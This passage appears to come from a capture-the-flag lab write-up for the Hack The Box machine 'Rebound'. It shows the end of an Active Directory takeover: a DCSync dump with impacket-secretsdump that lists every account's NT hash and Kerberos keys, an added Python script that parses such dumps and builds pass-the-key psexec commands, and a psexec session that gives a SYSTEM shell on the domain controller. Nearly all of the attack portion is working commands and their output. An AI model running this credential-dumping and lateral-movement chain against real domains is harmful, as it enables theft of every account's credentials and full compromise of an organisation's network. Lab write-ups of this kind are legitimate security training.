DCSync
Using the TGT of the dc01$ machine account, the DCSync attack can be performed as the host itself: a domain controller's computer account already holds the directory replication rights (DS-Replication-Get-Changes / -All) that the DRSUAPI method relies on, so no further privilege escalation is needed. Note the escaped $ in the ccache filename, which keeps the shell from expanding it as a variable. The "Policy SPN target name validation" warning that secretsdump prints is only informational here: the full DRSUAPI dump went through and returned the NT hash and Kerberos keys of every account, including krbtgt and the machine accounts.
Hashdump
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ KRB5CCNAME=dc01\$.ccache impacket-secretsdump 'rebound.htb/dc01$@dc01.rebound.htb' -k -no-pass -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1108b27a9ff61ed4139d1443fbcf664b:::
ppaul:1951:aad3b435b51404eeaad3b435b51404ee:7785a4172e31e908159b0904e1153ec0:::
llune:2952:aad3b435b51404eeaad3b435b51404ee:e283977e2cbffafc0d6a6bd2a50ea680:::
fflock:3382:aad3b435b51404eeaad3b435b51404ee:1fc1d0f9c5ada600903200bc308f7981:::
jjones:5277:aad3b435b51404eeaad3b435b51404ee:e1ca2a386be17d4a7f938721ece7fef7:::
mmalone:5569:aad3b435b51404eeaad3b435b51404ee:87becdfa676275415836f7e3871eefa3:::
nnoon:5680:aad3b435b51404eeaad3b435b51404ee:f9a5317b1011878fc527848b6282cd6e:::
ldap_monitor:7681:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
oorend:7682:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
winrm_svc:7684:aad3b435b51404eeaad3b435b51404ee:4469650fd892e98933b4536d2e86e512:::
batch_runner:7685:aad3b435b51404eeaad3b435b51404ee:d8a34636c7180c5851c19d3e865814e0:::
tbrady:7686:aad3b435b51404eeaad3b435b51404ee:114e76d0be2f60bd75dc160ab3607215:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:989c1783900ffcb85de8d5ca4430c70f:::
delegator$:7687:aad3b435b51404eeaad3b435b51404ee:4ea3a31438d84c0cc5e29c8a1773437f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
krbtgt:aes256-cts-hmac-sha1-96:97d63bd13c99edc3e88d42e2e964246a556cced73db6a75219632cdf9a32e192
krbtgt:aes128-cts-hmac-sha1-96:3c2069c0e7aff8ccceddd9b4f533ab2d
krbtgt:des-cbc-md5:2ae5bfc82c7c46cb
ppaul:aes256-cts-hmac-sha1-96:121c70ec57e22ce2752027163d0f7482932d239609194cef652783bc1f1eb2ea
ppaul:aes128-cts-hmac-sha1-96:4ec3a78a5111ca282ab87692d51c4150
ppaul:des-cbc-md5:d354b098136ec726
llune:aes256-cts-hmac-sha1-96:7e8e0bd4dd39ccf4060ca780944c379d975dbd2d4c438db63b21614578ec6384
llune:aes128-cts-hmac-sha1-96:9a7afe8a130f2b9f44309c5c357df71b
llune:des-cbc-md5:a7d0b08310769ebc
fflock:aes256-cts-hmac-sha1-96:5edee5abe58354f436b85a1ea2855319effb6dfa8689fb42c6eaf91662cbf42e
fflock:aes128-cts-hmac-sha1-96:d1c5c3d0734a4c107c1ae0f2eaeb7927
fflock:des-cbc-md5:26b9b9044ca77373
jjones:aes256-cts-hmac-sha1-96:142d9a8b57934fd16ab2e91998279892de9a02e53663babe319c79eedcd29d91
jjones:aes128-cts-hmac-sha1-96:0d09e595b77fe71177925d645b085ee1
jjones:des-cbc-md5:43f8d93291526bda
mmalone:aes256-cts-hmac-sha1-96:b0c89ffdd5af3cc44a79d28d8b6b8735ed09d697ee6f1bc497008abb5a669fe2
mmalone:aes128-cts-hmac-sha1-96:0511a2d3d7214b21a367bc108f6b7ec7
mmalone:des-cbc-md5:23c2ba0be5e98525
nnoon:aes256-cts-hmac-sha1-96:347e911d23f4fb27d5d64dfbdd90ca6b1de7b345f3cafb89dc4b3a9b84508249
nnoon:aes128-cts-hmac-sha1-96:2479824ed08e2b6776483878e5260421
nnoon:des-cbc-md5:26070be583b00e2f
ldap_monitor:aes256-cts-hmac-sha1-96:f259e938b7fd99f96dd0f6dae29ed97d362091df468278556b77ede6d93306c7
ldap_monitor:aes128-cts-hmac-sha1-96:9974760e486e60edda8fa9a71f6fe5fc
ldap_monitor:des-cbc-md5:3b3d4632083e1361
oorend:aes256-cts-hmac-sha1-96:e8841ae154446f8571ac993b8ce989d14e5c31dc8dbfa00f7eb47652609e2048
oorend:aes128-cts-hmac-sha1-96:5f028e7498cadeb751342cfe73a8959a
oorend:des-cbc-md5:19a858d3973df716
winrm_svc:aes256-cts-hmac-sha1-96:886a948e85ab132a30e88c70bb56c3c5294b4f57708b480625af7ae12fc374a1
winrm_svc:aes128-cts-hmac-sha1-96:096f92b7f71828012f8e26f861d4254b
winrm_svc:des-cbc-md5:10894032252a6707
batch_runner:aes256-cts-hmac-sha1-96:b3c35b6d874a958fcce2d2609578097d570ab6eefbc313428c7b49ff9ff69dcb
batch_runner:aes128-cts-hmac-sha1-96:b1841a1db708b64f7395c6c77759b32e
batch_runner:des-cbc-md5:a7d5523dc80ec402
tbrady:aes256-cts-hmac-sha1-96:5c634afa0ffaf0ad3ac04fdd47ffd995362b17b6260172644f3723cfcd3d280f
tbrady:aes128-cts-hmac-sha1-96:a33995844f38022195e60c880e2c8efc
tbrady:des-cbc-md5:46fbdcc22c437fcd
DC01$:aes256-cts-hmac-sha1-96:5cfcef579e83b6b3f8d29dac49ed7b3ee9b43c129600ce55a7d915b7456198c0
DC01$:aes128-cts-hmac-sha1-96:73f487f2cfddcdf50dc5349c836e2ea6
DC01$:des-cbc-md5:0eba19c2f4081619
delegator$:aes256-cts-hmac-sha1-96:d3a9b6d71b3d20b587a56f1d165fdb73761aa971c3fc1f43218b50007241b081
delegator$:aes128-cts-hmac-sha1-96:d5664a49f2877932d23d1842013476f0
delegator$:des-cbc-md5:3b68254c52584f3d
[*] Cleaning up...
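A dump like the one above is easier to triage with a small parser than by eye. The script below is an added example (not part of the original write-up or of Impacket): it parses secretsdump output into one structure per account, flags password reuse (two accounts with the same NT hash, as ldap_monitor and oorend have above), flags empty-password accounts, and builds the pass-the-key psexec line used in the next step. The sample input is a constructed excerpt of this page's output; the domain, target and DC IP passed to the command builder are assumed values.

```python
"""Triage a secretsdump.py DCSync dump: collect NT hashes and Kerberos keys
per account, flag password reuse and empty passwords, and emit the
impacket-psexec pass-the-key line for a chosen account."""
import re
from collections import defaultdict

# Constructed sample: a few lines taken from the secretsdump output on this
# page so the script runs offline.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:176be138594933bb67db3b2572fc91b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
ldap_monitor:7681:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
oorend:7682:aad3b435b51404eeaad3b435b51404ee:5af1ff64aac6100ea8fd2223b642d818:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:989c1783900ffcb85de8d5ca4430c70f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1
Administrator:aes128-cts-hmac-sha1-96:efc20229b67e032cba60e05a6c21431f
Administrator:des-cbc-md5:ad8ac2a825fe1080
DC01$:aes256-cts-hmac-sha1-96:5cfcef579e83b6b3f8d29dac49ed7b3ee9b43c129600ce55a7d915b7456198c0
[*] Cleaning up...
"""

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# user:rid:lmhash:nthash:::   (an optional DOMAIN\ prefix is tolerated)
HASH_LINE = re.compile(r"^(?:[^\\:]+\\)?([^:]+):(\d+):([0-9a-f]{32}):([0-9a-f]{32}):::$")
# user:etype:key
KEY_LINE = re.compile(
    r"^(?:[^\\:]+\\)?([^:]+):(aes256-cts-hmac-sha1-96|aes128-cts-hmac-sha1-96|des-cbc-md5):([0-9a-f]+)$")


def parse_secretsdump(text):
    """Return {account: {"rid": int, "nt": str, "keys": {etype: hexkey}}}."""
    accounts = defaultdict(lambda: {"rid": None, "nt": None, "keys": {}})
    for line in text.splitlines():
        line = line.strip()
        m = HASH_LINE.match(line)
        if m:
            user, rid, _lm, nt = m.groups()
            accounts[user]["rid"] = int(rid)
            accounts[user]["nt"] = nt
            continue
        m = KEY_LINE.match(line)
        if m:
            user, etype, key = m.groups()
            accounts[user]["keys"][etype] = key
    return dict(accounts)


def shared_nt_hashes(accounts):
    """Group accounts by NT hash; any group with more than one member
    means the same password is set on several accounts."""
    by_hash = defaultdict(set)
    for user, rec in accounts.items():
        if rec["nt"]:
            by_hash[rec["nt"]].add(user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


def empty_password_accounts(accounts):
    """Accounts whose NT hash is that of the empty string."""
    return sorted(u for u, rec in accounts.items() if rec["nt"] == EMPTY_NT)


def psexec_cmd(accounts, user, domain, target, dc_ip):
    """Build the impacket-psexec line: pass-the-key with the AES-256 key when
    it was dumped (Kerberos, as on this page), otherwise pass-the-hash."""
    rec = accounts[user]
    aes = rec["keys"].get("aes256-cts-hmac-sha1-96")
    if aes:
        return (f"impacket-psexec {domain}/{user}@{target} -no-pass "
                f"-aesKey {aes} -dc-ip {dc_ip}")
    return f"impacket-psexec {domain}/{user}@{target} -hashes :{rec['nt']} -dc-ip {dc_ip}"


if __name__ == "__main__":
    accts = parse_secretsdump(SAMPLE_DUMP)
    for h, users in shared_nt_hashes(accts).items():
        print(f"[!] password reuse ({h}): {', '.join(sorted(users))}")
    for u in empty_password_accounts(accts):
        print(f"[!] empty password: {u}")
    # Assumed target values, matching the lab on this page.
    print(psexec_cmd(accts, "Administrator", "rebound.htb", "dc01.rebound.htb", "10.10.11.231"))
```

Feed it the full dump (python3 triage.py < dump.txt after swapping SAMPLE_DUMP for sys.stdin.read()) and the reuse check is the one finding a pure eyeball review tends to miss: in the dump above ldap_monitor and oorend carry the same NT hash, so a credential recovered for one also works for the other.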
Domain Level Compromise
Shell Drop
With the Administrator aes256 key from the dump, impacket-psexec authenticates over Kerberos (pass-the-key; supplying -aesKey makes impacket use Kerberos, so no password is needed) and drops a SYSTEM shell on the DC. The repeated "CCache file is not found" lines are benign: KRB5CCNAME is not set for this command, so impacket requests a fresh TGT with the supplied key instead of reading a cache.
┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ impacket-psexec rebound.htb/administrator@dc01.rebound.htb -no-pass -aesKey 32fd2c37d71def86d7687c95c62395ffcbeaf13045d1779d6c0b95b056d5adb1 -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Requesting shares on dc01.rebound.htb.....
[*] Found writable share ADMIN$
[*] Uploading file OsqJVewi.exe
[*] Opening SVCManager on dc01.rebound.htb.....
[*] Creating service VKqu on dc01.rebound.htb.....
[*] Starting service VKqu.....
[-] CCache file is not found. Skipping...
[-] CCache file is not found. Skipping...
[!] Press help for extra shell commands
[-] CCache file is not found. Skipping...
Microsoft Windows [Version 10.0.17763.4720]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
dc01
c:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.231
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2
System Level Compromise
Administrator NT hash: 176be138594933bb67db3b2572fc91b8 (from the DCSync dump above; usable for pass-the-hash where NTLM is accepted, alongside the aes256 key used for the Kerberos shell)